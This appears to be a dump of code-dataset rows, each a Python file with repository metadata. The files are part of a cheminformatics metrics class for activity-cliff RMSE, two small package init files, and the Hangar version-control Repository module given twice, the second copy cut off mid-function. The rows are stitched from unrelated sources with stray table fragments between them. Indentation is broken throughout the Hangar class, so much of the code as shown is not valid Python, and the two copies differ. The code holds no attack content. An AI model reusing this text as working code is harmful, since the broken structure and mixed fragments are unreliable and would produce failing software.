        subset_prd = [prd for prd, flag in zip(predictions, cliff_mask) if flag == 1]
        return calc_rmse(subset_ref, subset_prd)

    def calc_cliff_rmse(self, reference=None, predictions=None, tanimoto_cliff_compounds=None,
                        scaffold_cliff_compounds=None, levenshtein_cliff_compounds=None,
                        soft_consensus_cliff_compounds=None):
        """ Calculate the rmse of only cliff compounds

        Args:
            reference: (lst) true bioactivity values
            predictions: (lst) predicted bioactivity values
            tanimoto_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
            scaffold_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
            levenshtein_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)
            soft_consensus_cliff_compounds: (lst) Binary list of cliff compounds (same length as predictions)

        Returns: (dict) rmse over each cliff-compound subset whose mask is set
        """
        if reference is not None:
            self.reference = reference
        if predictions is not None:
            self.predictions = predictions
        if tanimoto_cliff_compounds is not None:
            self.tanimoto_cliff_compounds = tanimoto_cliff_compounds
        if scaffold_cliff_compounds is not None:
            self.scaffold_cliff_compounds = scaffold_cliff_compounds
        if levenshtein_cliff_compounds is not None:
            self.levenshtein_cliff_compounds = levenshtein_cliff_compounds
        if soft_consensus_cliff_compounds is not None:
            self.soft_consensus_cliff_compounds = soft_consensus_cliff_compounds

        # For every provided mask, compute RMSE over the flagged subset only.
        if self.tanimoto_cliff_compounds is not None:
            self.tanimoto_cliff_rmse = self._cliff_subset_rmse(
                self.reference, self.predictions, self.tanimoto_cliff_compounds)
        if self.scaffold_cliff_compounds is not None:
            self.scaffold_cliff_rmse = self._cliff_subset_rmse(
                self.reference, self.predictions, self.scaffold_cliff_compounds)
        if self.levenshtein_cliff_compounds is not None:
            self.levenshtein_cliff_rmse = self._cliff_subset_rmse(
                self.reference, self.predictions, self.levenshtein_cliff_compounds)
        if self.soft_consensus_cliff_compounds is not None:
            self.soft_consensus_cliff_rmse = self._cliff_subset_rmse(
                self.reference, self.predictions, self.soft_consensus_cliff_compounds)

        return {'tanimoto_cliff_rmse': self.tanimoto_cliff_rmse,
                'scaffold_cliff_rmse': self.scaffold_cliff_rmse,
                'levenshtein_cliff_rmse': self.levenshtein_cliff_rmse,
                'soft_consensus_cliff_rmse': self.soft_consensus_cliff_rmse}

    def to_csv(self, filename, algorithm: Algorithms = None):
        """Append a one-line summary of this result to *filename* (CSV).

        Writes a header row first when the file does not yet exist. Requires
        ``self.data`` to be populated; otherwise this is a no-op.
        """
        # Create output file if it doesn't exist
        if self.data is not None:
            if not os.path.isfile(filename):
                with open(filename, 'w') as f:
                    f.write('dataset,'
                            'algorithm,'
                            'descriptor,'
                            'augmentation,'
                            'rmse,'
                            'cliff_rmse,'
                            'n_compounds,'
                            'n_cliff_compounds,'
                            'n_compounds_train,'
                            'n_cliff_compounds_train,'
                            'n_compounds_test,'
                            'n_cliff_compounds_test\n')
            with open(filename, 'a') as f:
                f.write(f'{self.data.name},'
                        f'{algorithm.value},'
                        f'{self.data.descriptor.value},'
                        f'{self.data.augmentation},'
                        f'{self.rmse},'
                        f'{self.soft_consensus_cliff_rmse},'
                        f'{self.data.cliffs.stats["n_compounds"]},'
                        f'{self.data.cliffs.stats["n_soft_consensus_cliff_compounds"]},'
                        f'{self.data.cliffs.stats["n_compounds_train"]},'
                        f'{self.data.cliffs.stats["n_soft_consensus_cliff_compounds_train"]},'
                        f'{self.data.cliffs.stats["n_compounds_test"]},'
                        f'{self.data.cliffs.stats["n_soft_consensus_cliff_compounds_test"]}\n')

    def __repr__(self):
        """Multi-line summary of the headline metrics."""
        return f"RMSE: {self.rmse:.4f}\n" \
               f"Q2F3: {self.q2f3:.4f}\n" \
               f"AC-RMSE: {self.soft_consensus_cliff_rmse:.4f}\n"
| pt | 0.111068 | 2.543025 | 3 |
checkout/orders/__init__.py | accelero-cloud/tutorials | 2 | 13522 | <reponame>accelero-cloud/tutorials
from checkout.orders.order_service import Order, AuthorisationRequest
| from checkout.orders.order_service import Order, AuthorisationRequest | none | 1 | 1.117923 | 1 |
hiisi/__init__.py | ritvje/hiisi | 0 | 13523 | from .hiisi import HiisiHDF
from .odim import OdimPVOL, OdimCOMP
__version__ = "0.0.6"
| from .hiisi import HiisiHDF
from .odim import OdimPVOL, OdimCOMP
__version__ = "0.0.6"
| none | 1 | 1.053539 | 1 |
src/hangar/repository.py | jjmachan/hangar-py | 0 | 13524 | from pathlib import Path
import weakref
import warnings
from typing import Union, Optional, List
from .merger import select_merge_algorithm
from .constants import DIR_HANGAR
from .remotes import Remotes
from .context import Environments
from .diagnostics import ecosystem, integrity
from .records import heads, parsing, summarize, vcompat, commiting
from .checkout import ReaderCheckout, WriterCheckout
from .diff import DiffAndConflicts, ReaderUserDiff
from .utils import (
is_valid_directory_path,
is_suitable_user_key,
is_ascii,
folder_size,
format_bytes
)
class Repository(object):
"""Launching point for all user operations in a Hangar repository.
All interaction, including the ability to initialize a repo, checkout a
commit (for either reading or writing), create a branch, merge branches, or
generally view the contents or state of the local repository starts here.
Just provide this class instance with a path to an existing Hangar
repository, or to a directory one should be initialized, and all required
data for starting your work on the repo will automatically be populated.
>>> from hangar import Repository
>>> repo = Repository('foo/path/to/dir')
Parameters
----------
path : Union[str, os.PathLike]
local directory path where the Hangar repository exists (or initialized)
exists : bool, optional
True if a Hangar repository should exist at the given directory path.
Should no Hangar repository exists at that location, a UserWarning will
be raised indicating that the :meth:`init` method needs to be called.
False if the provided path does not need to (but optionally can) contain a
Hangar repository. if a Hangar repository does not exist at that path, the
usual UserWarning will be suppressed.
In both cases, the path must exist and the user must have sufficient OS
permissions to write to that location. Default = True
"""
def __init__(self, path: Union[str, Path], exists: bool = True):
    """Bind this object to the Hangar repo at ``path`` (see class docstring).

    When ``exists`` is False, the "repository not initialized" warning that
    :class:`Environments` would emit for an empty directory is suppressed.
    """
    if isinstance(path, (str, bytes)):
        path = Path(path)
    try:
        validated_dir = is_valid_directory_path(path)
    except (TypeError, NotADirectoryError, PermissionError) as e:
        raise e from None

    hangar_dir = validated_dir.joinpath(DIR_HANGAR)
    if exists is False:
        # Caller stated a repo need not exist here; mute the UserWarning
        # raised when no initialized repository is found.
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', UserWarning)
            environments = Environments(pth=hangar_dir)
    else:
        environments = Environments(pth=hangar_dir)

    self._repo_path: Path = hangar_dir
    self._env: Environments = environments
    self._remote: Remotes = Remotes(self._env)
def _repr_pretty_(self, p, cycle):
    """provide a pretty-printed repr for ipython based user interaction.

    Parameters
    ----------
    p : printer
        io stream printer type object which is provided via ipython
    cycle : bool
        if the pretty-printer detects a cycle or infinite loop. Not a
        concern here since we just output the text and return, no looping
        required.
    """
    self.__verify_repo_initialized()
    # Backslash-newline inside the f-string literal keeps this one string;
    # any leading whitespace on the continuation lines is part of the output.
    # NOTE(review): the label reads "Writer-Lock Free", so
    # `heads.writer_lock_held` presumably reports lock *availability* here —
    # confirm against the heads module.
    res = f'Hangar {self.__class__.__name__}\
\n Repository Path : {self.path}\
\n Writer-Lock Free : {heads.writer_lock_held(self._env.branchenv)}\n'
    p.text(res)
def __repr__(self):
"""Override the default repr to show useful information to developers.
Note: the pprint repr (ipython enabled) is separately defined in
:py:meth:`_repr_pretty_`. We specialize because we assume that anyone
operating in a terminal-based interpreter is probably a more advanced
developer-type, and expects traditional repr information instead of a
user facing summary of the repo. Though if we're wrong, go ahead and
feel free to reassign the attribute :) won't hurt our feelings, promise.
Returns
-------
string
formatted representation of the object
"""
res = f'{self.__class__}(path={self._repo_path})'
return res
def __verify_repo_initialized(self):
"""Internal method to verify repo initialized before operations occur
Raises
------
RuntimeError
If the repository db environments have not been initialized at the
specified repo path.
"""
if not self._env.repo_is_initialized:
msg = f'Repository at path: {self._repo_path} has not been initialized. '\
f'Please run the `init_repo()` function'
raise RuntimeError(msg)
@property
def remote(self) -> Remotes:
    """Accessor to the methods controlling remote interactions.

    A weak proxy is handed out so callers cannot keep the underlying
    :class:`Remotes` object alive past the repository's lifetime.

    Returns
    -------
    Remotes
        Accessor object methods for controlling remote interactions.
    """
    return weakref.proxy(self._remote)
@property
def path(self) -> str:
"""Return the path to the repository on disk, read-only attribute
Returns
-------
str
path to the specified repository, not including `.hangar` directory
"""
self.__verify_repo_initialized()
return str(self._repo_path.parent)
@property
def writer_lock_held(self) -> bool:
    """Whether the writer lock is currently held. Read-only attribute.

    Returns
    -------
    bool
        True if the writer-lock is held, False if it is free.
    """
    self.__verify_repo_initialized()
    # heads.writer_lock_held appears to report lock *availability* (see the
    # "Writer-Lock Free" label in _repr_pretty_), hence the negation.
    return not heads.writer_lock_held(self._env.branchenv)
@property
def version(self) -> str:
    """Version of the Hangar software this repository was written with.

    Returns
    -------
    str
        semantic (major.minor.micro) version of the repo software.
    """
    self.__verify_repo_initialized()
    spec = vcompat.get_repository_software_version_spec(self._env.branchenv)
    return str(spec)
@property
def initialized(self) -> bool:
"""
Check if the repository has been initialized or not
Returns
-------
bool
True if repository has been initialized.
"""
return self._env.repo_is_initialized
@property
def size_nbytes(self) -> int:
    """Disk space used by the repository, in bytes.

    >>> repo.size_nbytes
    1234567890

    Returns
    -------
    int
        number of bytes used by the repository on disk.
    """
    self.__verify_repo_initialized()
    return folder_size(self._repo_path, recurse=True)
@property
def size_human(self) -> str:
    """Disk space used by the repository as a human readable string.

    >>> repo.size_human
    '1.23 GB'

    Returns
    -------
    str
        disk usage formatted for human consumption.
    """
    self.__verify_repo_initialized()
    return format_bytes(folder_size(self._repo_path, recurse=True))
def checkout(self,
             write: bool = False,
             *,
             branch: str = '',
             commit: str = '') -> Union[ReaderCheckout, WriterCheckout]:
    """Open a read-only or write-enabled view of the repo at a point in time.

    Only one write-enabled checkout may exist at a time, and it is always
    created from the HEAD commit of a branch. Any number of read-only
    checkouts can coexist, targeting either a branch HEAD or a commit digest.

    Parameters
    ----------
    write : bool, optional
        whether the checkout should be write-capable, defaults to False
    branch : str, optional
        branch whose HEAD commit state is checked out; when ``write=True``
        and left empty, the current staging branch is used, defaults to ''
    commit : str, optional
        explicit commit digest to check out instead of a branch HEAD;
        takes precedence over ``branch``, and is only permitted for
        read-only checkouts, defaults to ''

    Raises
    ------
    ValueError
        If the value of the `write` argument is not boolean
    ValueError
        If ``commit`` is set while ``write=True``; only ``branch`` is
        allowed in that case.

    Returns
    -------
    Union[ReaderCheckout, WriterCheckout]
        Checkout object used to interact with the repository data
    """
    self.__verify_repo_initialized()
    try:
        if write is True:
            if commit != '':
                raise ValueError(
                    f'Only `branch` argument can be set if `write=True`. '
                    f'Setting `commit={commit}` not allowed.')
            if branch == '':
                # default to whichever branch the staging area is based on
                branch = heads.get_staging_branch_head(self._env.branchenv)
            return WriterCheckout(
                repo_pth=self._repo_path,
                branch_name=branch,
                hashenv=self._env.hashenv,
                refenv=self._env.refenv,
                stageenv=self._env.stageenv,
                branchenv=self._env.branchenv,
                stagehashenv=self._env.stagehashenv)
        elif write is False:
            target_digest = self._env.checkout_commit(
                branch_name=branch, commit=commit)
            return ReaderCheckout(
                base_path=self._repo_path,
                dataenv=self._env.cmtenv[target_digest],
                hashenv=self._env.hashenv,
                branchenv=self._env.branchenv,
                refenv=self._env.refenv,
                commit=target_digest)
        else:
            raise ValueError("Argument `write` only takes True or False as value")
    except (RuntimeError, ValueError) as e:
        # suppress internal context so callers see a clean error
        raise e from None
def clone(self, user_name: str, user_email: str, remote_address: str,
          *, remove_old: bool = False) -> str:
    """Download a remote repository to the local disk (like ``git clone``).

    Pulls every commit record and all data reachable from the remote's
    `master` branch HEAD. Fails if a repository already exists at this
    directory (unless ``remove_old`` is set).

    Parameters
    ----------
    user_name : str
        Name recorded permanently in commits made to this repository.
    user_email : str
        Email address recorded permanently in commits.
    remote_address : str
        location of the running, reachable
        :class:`hangar.remote.server.HangarServer` process.
    remove_old : bool, optional, kwarg only
        DANGER! DEVELOPMENT USE ONLY! When True, any repository already on
        disk at this path is wiped and replaced by the clone. Default False.

    Returns
    -------
    str
        Name of the master branch of the newly cloned repository.
    """
    self.init(user_name=user_name, user_email=user_email, remove_old=remove_old)
    self._remote.add(name='origin', address=remote_address)
    fetched_branch = self._remote.fetch(remote='origin', branch='master')
    fetched_head = heads.get_branch_head_commit(
        self._env.branchenv, branch_name=fetched_branch)
    heads.set_branch_head_commit(self._env.branchenv, 'master', fetched_head)

    # rebuild the staging area from the new master HEAD, silencing the
    # "checkout of fresh repo" warnings emitted along the way
    with warnings.catch_warnings(record=False):
        warnings.simplefilter('ignore', category=UserWarning)
        co = self.checkout(write=True, branch='master')
        co.reset_staging_area()
        co.close()
    return 'master'
def init(self,
         user_name: str,
         user_email: str,
         *,
         remove_old: bool = False) -> str:
    """Initialize a Hangar repository at this object's directory path.

    Must be called before any checkout can be performed.

    Parameters
    ----------
    user_name : str
        Name of the repository user account.
    user_email : str
        Email address of the repository user account.
    remove_old : bool, kwarg-only
        DEVELOPER USE ONLY -- remove and reinitialize an existing Hangar
        repository at the given path, Default = False

    Returns
    -------
    str
        full directory path where the repository was initialized on disk.
    """
    initialized_path = self._env.init_repo(user_name=user_name,
                                           user_email=user_email,
                                           remove_old=remove_old)
    return str(initialized_path)
def log(self,
        branch: str = None,
        commit: str = None,
        *,
        return_contents: bool = False,
        show_time: bool = False,
        show_user: bool = False) -> Optional[dict]:
    """Display (or return) a pretty printed commit log graph.

    Parameters
    ----------
    branch : str, optional
        branch name whose history the log starts from. (Default None)
    commit : str, optional
        commit hash the log starts from. (Default None)
    return_contents : bool, optional, kwarg only
        when True, return the commit-graph specifications as a dict for
        programmatic use instead of printing.
    show_time : bool, optional, kwarg only
        when printing, also show each commit's timestamp.
    show_user : bool, optional, kwarg only
        when printing, also show each commit's committer.

    Returns
    -------
    Optional[dict]
        commit ancestor graph and specifications, when
        ``return_contents=True``.
    """
    self.__verify_repo_initialized()
    return summarize.log(branchenv=self._env.branchenv,
                         refenv=self._env.refenv,
                         branch=branch,
                         commit=commit,
                         return_contents=return_contents,
                         show_time=show_time,
                         show_user=show_user)
def summary(self, *, branch: str = '', commit: str = '') -> None:
    """Print a summary of the repository contents to the terminal.

    Parameters
    ----------
    branch : str, optional
        branch whose HEAD commit is used as the summary point (Default '')
    commit : str, optional
        specific commit hash used as the summary point. (Default '')
    """
    self.__verify_repo_initialized()
    buf = summarize.summary(self._env, branch=branch, commit=commit)
    print(buf.getvalue())
    return None
def _details(self, *, line_limit=100, line_length=100) -> None:  # pragma: no cover
    """DEVELOPER USE ONLY: Dump details of the underlying db structure to stdout.
    """
    # same env order as before: branch, ref, hash, stage, stagehash, then
    # every per-commit environment
    environments = [self._env.branchenv,
                    self._env.refenv,
                    self._env.hashenv,
                    self._env.stageenv,
                    self._env.stagehashenv,
                    *self._env.cmtenv.values()]
    for env in environments:
        print(summarize.details(
            env, line_limit=line_limit, line_length=line_length).getvalue())
    return
def _ecosystem_details(self) -> dict:
    """DEVELOPER USE ONLY: log and return package versions on the system.
    """
    return ecosystem.get_versions()
def diff(self, master: str, dev: str) -> DiffAndConflicts:
    """Calculate diff between master and dev branch/commits.

    Diff is calculated as if we are to merge "dev" into "master".

    Parameters
    ----------
    master: str
        branch name or commit hash digest to use as the "master" which
        changes made in "dev" are compared to.
    dev: str
        branch name or commit hash digest to use as the "dev"
        (ie. "feature") branch whose changes are compared against the
        contents of "master".

    Returns
    -------
    DiffAndConflicts
        Standard output diff structure.

    Raises
    ------
    ValueError
        if either argument is neither an existing branch name nor a commit
        digest present in the repository history.
    """
    current_branches = self.list_branches()

    def resolve_head(label: str, spec: str) -> str:
        """Map a branch name to its HEAD digest, or validate a raw digest."""
        if spec in current_branches:
            return heads.get_branch_head_commit(
                branchenv=self._env.branchenv, branch_name=spec)
        cmtExists = commiting.check_commit_hash_in_history(
            refenv=self._env.refenv, commit_hash=spec)
        if not cmtExists:
            raise ValueError(f'`{label}` {spec} is not valid branch/commit.')
        return spec

    # standardize both arguments into commit digests before diffing
    masterHEAD = resolve_head('master', master)
    devHEAD = resolve_head('dev', dev)

    differ = ReaderUserDiff(commit_hash=masterHEAD,
                            branchenv=self._env.branchenv,
                            refenv=self._env.refenv)
    return differ.commit(dev_commit_hash=devHEAD)
def merge(self, message: str, master_branch: str, dev_branch: str) -> str:
    """Perform a merge of the changes made on two branches.

    Parameters
    ----------
    message: str
        Commit message to use for this merge.
    master_branch : str
        name of the master branch to merge into
    dev_branch : str
        name of the dev/feature branch to merge

    Returns
    -------
    str
        Hash of the merge commit, if one could be written.
    """
    self.__verify_repo_initialized()
    return select_merge_algorithm(
        message=message,
        branchenv=self._env.branchenv,
        stageenv=self._env.stageenv,
        refenv=self._env.refenv,
        stagehashenv=self._env.stagehashenv,
        master_branch=master_branch,
        dev_branch=dev_branch,
        repo_path=self._repo_path)
def create_branch(self, name: str, base_commit: str = None) -> heads.BranchHead:
    """Create a branch with the provided name from a certain commit.

    When ``base_commit`` is omitted, the current writer branch HEAD commit
    is used as the branch root. Creating a branch does not open a checkout;
    use :meth:`checkout` to interact with the data.

    >>> repo.create_branch('testbranch')
    BranchHead(name='testbranch', digest='b66b...a8cc')

    Parameters
    ----------
    name : str
        name to assign to the new branch
    base_commit : str, optional
        commit hash the branch root starts at; defaults to the writer
        branch HEAD commit at the time of execution.

    Returns
    -------
    :class:`~.heads.BranchHead`
        NamedTuple[str, str] with ``name`` and ``digest`` of the created
        branch.

    Raises
    ------
    ValueError
        If the branch name contains characters outside alpha-numeric ascii
        plus ".", "_", "-" (no whitespace), or is > 64 characters, or if
        the branch already exists.
    RuntimeError
        If the repository does not have at least one commit on the default
        (``master``) branch.
    """
    self.__verify_repo_initialized()
    if (not is_ascii(name)) or (not is_suitable_user_key(name)):
        raise ValueError(
            f'Branch name provided: {name} invalid. Must contain only alpha-numeric '
            f'or "." "_" "-" ascii characters. And be <= 64 Characters') from None
    return heads.create_branch(
        branchenv=self._env.branchenv,
        name=name,
        base_commit=base_commit)
def remove_branch(self, name: str, *, force_delete: bool = False) -> heads.BranchHead:
    """Permanently delete a branch pointer from the repository history.

    By default, deletion is refused unless the branch HEAD is referenced in
    (or identical to) another live branch's history -- a guarantee that all
    of its changes have been merged and nothing is lost. Pass
    ``force_delete=True`` to remove an un-merged branch anyway; this may
    leave recent commits orphaned (unreachable).

    Note that only the branch name/digest *pointer* is removed. No commit
    refs or data are deleted from disk, so an accidentally force-deleted
    branch can be recovered by calling :meth:`create_branch` with the old
    HEAD digest as ``base_commit`` (if the digest is unknown, reach out on
    the project's Github Issues page for help recovering it).

    >>> repo.remove_branch('second-testbranch')
    BranchHead(name='second-testbranch', digest='9785...56da')
    >>> repo.remove_branch('first-testbranch', force_delete=True)
    BranchHead(name='first-testbranch', digest='9785...56da')

    Parameters
    ----------
    name : str
        name of the branch to delete. Must exist locally and cannot refer
        to a remote-tracked branch (ie. origin/devbranch).
    force_delete : bool, optional
        If True, remove the branch pointer even if its changes are
        un-merged in other branch histories, by default False

    Returns
    -------
    :class:`~.heads.BranchHead`
        NamedTuple[str, str] with ``name`` and ``digest`` of the deleted
        branch pointer.

    Raises
    ------
    ValueError
        If no branch with the provided name exists locally
    PermissionError
        If removal would leave the repository with zero local branches; if
        a write-enabled checkout currently holds the writer-lock; or if the
        branch forms the base of the current staging area.
    RuntimeError
        If the branch is not fully merged into other branch histories and
        ``force_delete`` is not True.
    """
    self.__verify_repo_initialized()
    return heads.remove_branch(branchenv=self._env.branchenv,
                               refenv=self._env.refenv,
                               name=name,
                               force_delete=force_delete)
def list_branches(self) -> List[str]:
    """List all branch names created in the repository.

    Returns
    -------
    List[str]
        the branch names recorded in the repository
    """
    self.__verify_repo_initialized()
    return heads.get_branch_names(self._env.branchenv)
def verify_repo_integrity(self) -> bool:
    """Run a full cryptographic verification of the repository data on disk.

    Every data piece is read back, hashed, and compared to its expected
    digest, and every commit ref is decompressed, re-serialized and
    re-hashed. Because each sample and each commit in the history must be
    processed (each exactly once), this may take a significant amount of
    time for repositories storing large quantities of data or containing
    very many commits.

    Returns
    -------
    bool
        True if integrity verification is successful, otherwise False; in
        this case, a message describing the offending component will be
        printed to stdout.
    """
    self.__verify_repo_initialized()
    branchenv = self._env.branchenv
    # take the writer lock for the duration of the verification run.
    heads.acquire_writer_lock(branchenv, 'VERIFY_PROCESS')
    try:
        integrity.run_verification(
            branchenv=branchenv,
            hashenv=self._env.hashenv,
            refenv=self._env.refenv,
            repo_path=self._env.repo_path)
    finally:
        heads.release_writer_lock(branchenv, 'VERIFY_PROCESS')
    return True
def force_release_writer_lock(self) -> bool:
    """Forcibly free the writer lock left behind by an unclosed write checkout.

    .. warning::

        *NEVER USE THIS METHOD IF A WRITER PROCESS IS CURRENTLY ACTIVE.*
        The implications of improper/malicious use are not understood, and
        there is a risk of undefined behavior or (potentially) data
        corruption.

    Closing a write-enabled checkout is currently the user's responsibility;
    if ``close()`` was never called before the program terminated, any new
    ``write=True`` checkout will fail until the lock is released through
    this method. This mechanism is subject to review/replacement in the
    future.

    Returns
    -------
    bool
        if the operation was successful.
    """
    self.__verify_repo_initialized()
    sentinel = parsing.repo_writer_lock_force_release_sentinal()
    return heads.release_writer_lock(self._env.branchenv, sentinel)
| from pathlib import Path
import weakref
import warnings
from typing import Union, Optional, List
from .merger import select_merge_algorithm
from .constants import DIR_HANGAR
from .remotes import Remotes
from .context import Environments
from .diagnostics import ecosystem, integrity
from .records import heads, parsing, summarize, vcompat, commiting
from .checkout import ReaderCheckout, WriterCheckout
from .diff import DiffAndConflicts, ReaderUserDiff
from .utils import (
is_valid_directory_path,
is_suitable_user_key,
is_ascii,
folder_size,
format_bytes
)
class Repository(object):
"""Launching point for all user operations in a Hangar repository.
All interaction, including the ability to initialize a repo, checkout a
commit (for either reading or writing), create a branch, merge branches, or
generally view the contents or state of the local repository starts here.
Just provide this class instance with a path to an existing Hangar
repository, or to a directory one should be initialized, and all required
data for starting your work on the repo will automatically be populated.
>>> from hangar import Repository
>>> repo = Repository('foo/path/to/dir')
Parameters
----------
path : Union[str, os.PathLike]
local directory path where the Hangar repository exists (or initialized)
exists : bool, optional
True if a Hangar repository should exist at the given directory path.
Should no Hangar repository exists at that location, a UserWarning will
be raised indicating that the :meth:`init` method needs to be called.
False if the provided path does not need to (but optionally can) contain a
Hangar repository. if a Hangar repository does not exist at that path, the
usual UserWarning will be suppressed.
In both cases, the path must exist and the user must have sufficient OS
permissions to write to that location. Default = True
"""
def __init__(self, path: Union[str, Path], exists: bool = True):
    # Normalize raw string/bytes paths into a pathlib object up front.
    if isinstance(path, (str, bytes)):
        path = Path(path)
    try:
        base = is_valid_directory_path(path)
    except (TypeError, NotADirectoryError, PermissionError) as e:
        raise e from None

    repo_pth = base / DIR_HANGAR
    if exists is False:
        # Caller opted out of the "no repository exists here" UserWarning.
        with warnings.catch_warnings():
            warnings.simplefilter('ignore', UserWarning)
            envs = Environments(pth=repo_pth)
    else:
        envs = Environments(pth=repo_pth)

    self._repo_path: Path = repo_pth
    self._env: Environments = envs
    self._remote: Remotes = Remotes(self._env)
def _repr_pretty_(self, p, cycle):
    """provide a pretty-printed repr for ipython based user interaction.

    Parameters
    ----------
    p : printer
        io stream printer type object which is provided via ipython
    cycle : bool
        if the pretty-printer detects a cycle or infinite loop. Not a
        concern here since we just output the text and return, no looping
        required.
    """
    self.__verify_repo_initialized()
    # NOTE: the backslash continuations keep this a single f-string; any
    # leading whitespace on the continued lines is part of the rendered text.
    res = f'Hangar {self.__class__.__name__}\
 \n Repository Path : {self.path}\
 \n Writer-Lock Free : {heads.writer_lock_held(self._env.branchenv)}\n'
    p.text(res)
def __repr__(self):
    """Developer-facing repr; the ipython pretty repr lives in
    :py:meth:`_repr_pretty_`.

    We specialize because anyone operating in a terminal-based interpreter
    is probably a more advanced developer-type and expects traditional repr
    information instead of a user facing summary of the repo. Feel free to
    reassign the attribute if you disagree.

    Returns
    -------
    string
        formatted representation of the object
    """
    return f'{self.__class__}(path={self._repo_path})'
def __verify_repo_initialized(self):
    """Raise if no repository has been initialized at the configured path.

    Raises
    ------
    RuntimeError
        If the repository db environments have not been initialized at the
        specified repo path.
    """
    if not self._env.repo_is_initialized:
        raise RuntimeError(
            f'Repository at path: {self._repo_path} has not been initialized. '
            f'Please run the `init_repo()` function')
@property
def remote(self) -> Remotes:
    """Accessor to the methods controlling remote interactions.

    .. seealso::

        :class:`Remotes` for available methods of this property

    Returns
    -------
    Remotes
        Accessor object methods for controlling remote interactions.
    """
    # hand out a weak proxy; it does not extend the lifetime of the
    # underlying Remotes instance owned by this Repository.
    return weakref.proxy(self._remote)
@property
def path(self) -> str:
    """Return the path to the repository on disk, read-only attribute

    Returns
    -------
    str
        path to the specified repository, not including `.hangar` directory
    """
    self.__verify_repo_initialized()
    # _repo_path points at the `.hangar` dir itself; its parent is the root.
    parent_dir = self._repo_path.parent
    return str(parent_dir)
@property
def writer_lock_held(self) -> bool:
    """Check if the writer lock is currently marked as held. Read-only attribute.

    Returns
    -------
    bool
        True is writer-lock is held, False if writer-lock is free.
    """
    self.__verify_repo_initialized()
    # heads.writer_lock_held() answers "is the lock free?" (it is printed
    # under the label "Writer-Lock Free" in _repr_pretty_), hence inverted.
    lock_free = heads.writer_lock_held(self._env.branchenv)
    return not lock_free
@property
def version(self) -> str:
    """Find the version of Hangar software the repository is written with

    Returns
    -------
    str
        semantic version of major, minor, micro version of repo software version.
    """
    self.__verify_repo_initialized()
    spec = vcompat.get_repository_software_version_spec(self._env.branchenv)
    return str(spec)
@property
def initialized(self) -> bool:
    """
    Check if the repository has been initialized or not

    Returns
    -------
    bool
        True if repository has been initialized.
    """
    # Unlike the other accessors this intentionally does NOT call
    # __verify_repo_initialized() -- it must be usable before init.
    return self._env.repo_is_initialized
@property
def size_nbytes(self) -> int:
    """Disk space used by the repository returned in number of bytes.

        >>> repo.size_nbytes
        1234567890
        >>> print(type(repo.size_nbytes))
        <class 'int'>

    Returns
    -------
    int
        number of bytes used by the repository on disk.
    """
    self.__verify_repo_initialized()
    nbytes = folder_size(self._repo_path, recurse=True)
    return nbytes
@property
def size_human(self) -> str:
    """Disk space used by the repository returned in human readable string.

        >>> repo.size_human
        '1.23 GB'
        >>> print(type(repo.size_human))
        <class 'str'>

    Returns
    -------
    str
        disk space used by the repository formated in human readable text.
    """
    # Delegate to size_nbytes so both size properties always measure usage
    # the same way (recursive walk of the repo dir) instead of duplicating
    # the folder_size() call here.
    return format_bytes(self.size_nbytes)
def checkout(self,
             write: bool = False,
             *,
             branch: str = '',
             commit: str = '') -> Union[ReaderCheckout, WriterCheckout]:
    """Checkout the repo at some point in time in either `read` or `write` mode.

    Only a single write-enabled checkout may exist at a time, and it must be
    created from the ``HEAD`` commit of a branch. Any number of reader
    checkouts can coexist, each specifying either a branch name or a commit
    hash.

    Parameters
    ----------
    write : bool, optional
        Specify if the checkout is write capable, defaults to False
    branch : str, optional
        name of the branch to checkout; uses the repo state as of that
        branch's ``HEAD`` commit at instantiation time, defaults to ''
    commit : str, optional
        specific commit hash to check out instead of a branch ``HEAD``.
        Takes precedence over ``branch`` and is only valid for read-only
        checkouts, defaults to ''

    Raises
    ------
    ValueError
        If ``write`` is not a boolean, or if ``commit`` is set together with
        ``write=True`` (only the ``branch`` argument is allowed then).

    Returns
    -------
    Union[ReaderCheckout, WriterCheckout]
        Checkout object which can be used to interact with the repository
        data
    """
    self.__verify_repo_initialized()
    try:
        if write is True:
            if commit != '':
                raise ValueError(
                    f'Only `branch` argument can be set if `write=True`. '
                    f'Setting `commit={commit}` not allowed.')
            if branch == '':
                # default to whichever branch currently backs the staging area.
                branch = heads.get_staging_branch_head(self._env.branchenv)
            return WriterCheckout(
                repo_pth=self._repo_path,
                branch_name=branch,
                hashenv=self._env.hashenv,
                refenv=self._env.refenv,
                stageenv=self._env.stageenv,
                branchenv=self._env.branchenv,
                stagehashenv=self._env.stagehashenv)
        elif write is False:
            digest = self._env.checkout_commit(
                branch_name=branch, commit=commit)
            return ReaderCheckout(
                base_path=self._repo_path,
                dataenv=self._env.cmtenv[digest],
                hashenv=self._env.hashenv,
                branchenv=self._env.branchenv,
                refenv=self._env.refenv,
                commit=digest)
        else:
            raise ValueError("Argument `write` only takes True or False as value")
    except (RuntimeError, ValueError) as e:
        # suppress the internal context; callers only need the final error.
        raise e from None
def clone(self, user_name: str, user_email: str, remote_address: str,
          *, remove_old: bool = False) -> str:
    """Download a remote repository to the local disk.

    Very similar to a `git clone` operation: all commit records, history,
    and data which are parents of the remote's `master` branch head commit
    are pulled down. The operation fails if a :class:`Repository` already
    exists at the specified directory.

    Parameters
    ----------
    user_name : str
        Name of the person who will make commits to the repository; recorded
        permanently in the commit records.
    user_email : str
        Email address of the repository user; recorded permanently in any
        commits created.
    remote_address : str
        location where the :class:`hangar.remote.server.HangarServer`
        process is running and accessible by the clone user.
    remove_old : bool, optional, kwarg only
        DANGER! DEVELOPMENT USE ONLY! If enabled, a repository existing on
        disk at the same path is completely removed and replaced with the
        newly cloned repo. (default is False, which refuses to create a
        repository at a location where one already exists.)

    Returns
    -------
    str
        Name of the master branch for the newly cloned repository.
    """
    self.init(user_name=user_name, user_email=user_email, remove_old=remove_old)
    self._remote.add(name='origin', address=remote_address)
    fetched_branch = self._remote.fetch(remote='origin', branch='master')
    head_digest = heads.get_branch_head_commit(
        self._env.branchenv, branch_name=fetched_branch)
    heads.set_branch_head_commit(self._env.branchenv, 'master', head_digest)
    # reset the staging area onto the fetched HEAD, silencing the
    # UserWarnings raised while bootstrapping the fresh repo.
    with warnings.catch_warnings(record=False):
        warnings.simplefilter('ignore', category=UserWarning)
        co = self.checkout(write=True, branch='master')
        co.reset_staging_area()
        co.close()
    return 'master'
def init(self,
         user_name: str,
         user_email: str,
         *,
         remove_old: bool = False) -> str:
